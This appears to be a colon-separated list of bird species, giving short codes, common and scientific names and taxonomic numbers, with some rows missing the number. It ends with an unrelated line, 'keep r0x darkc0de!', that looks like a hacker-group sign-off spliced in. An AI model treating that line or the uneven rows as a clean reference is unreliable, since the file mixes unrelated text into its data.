[1] estspa:Eastern Sharp-tailed Sparrow:Ammodramus caudacutus:EASTERN SHARP-TAILED SPARROW:AMMODRAMUS CAUDACUTUS:
[2] eucdov:Eurasian Collared-Dove:Streptopelia decaocto:EURASIAN COLLARED-DOVE:STREPTOPELIA DECAOCTO:12020020200:
[3] eucmer:(European) Common Merganser:Mergus merganser:(EUROPEAN) COMMON MERGANSER:MERGUS MERGANSER:07012160101:
[4] eugplo:European Golden-Plover:Pluvialis apricaria:EUROPEAN GOLDEN-PLOVER:PLUVIALIS APRICARIA:11022010200:
[5] euhspa:European House Sparrow:Passer domesticus:EUROPEAN HOUSE SPARROW:PASSER DOMESTICUS:
[6] eulgul:European Little Gull:Larus minutus:EUROPEAN LITTLE GULL:LARUS MINUTUS:11082010301:
[7] euphag:Euphagus sp.:Euphagus:EUPHAGUS SP.:EUPHAGUS:21246059999:
[8] eurbla:Eurasian Blackbird:Turdus merula:EURASIAN BLACKBIRD:TURDUS MERULA:21134100100:
[9] eurbul:Eurasian Bullfinch:Pyrrhula pyrrhula:EURASIAN BULLFINCH:PYRRHULA PYRRHULA:21252070100:
[10] eurcoo:Eurasian Coot:Fulica atra:EURASIAN COOT:FULICA ATRA:10011110100:
[11] eurcor:European Cormorant:Phalacrocorax carbo:EUROPEAN CORMORANT:PHALACROCORAX CARBO:
[12] eurcur:Eurasian Curlew:Numenius arquata:EURASIAN CURLEW:NUMENIUS ARQUATA:11071070700:
[13] eurgol:European Goldfinch:Carduelis carduelis:EUROPEAN GOLDFINCH:CARDUELIS CARDUELIS:21252050800:
[14] eurhob:Eurasian Hobby:Falco subbuteo:EURASIAN HOBBY:FALCO SUBBUTEO:08030020500:
40% to go.. till then.. keep r0x darkc0de!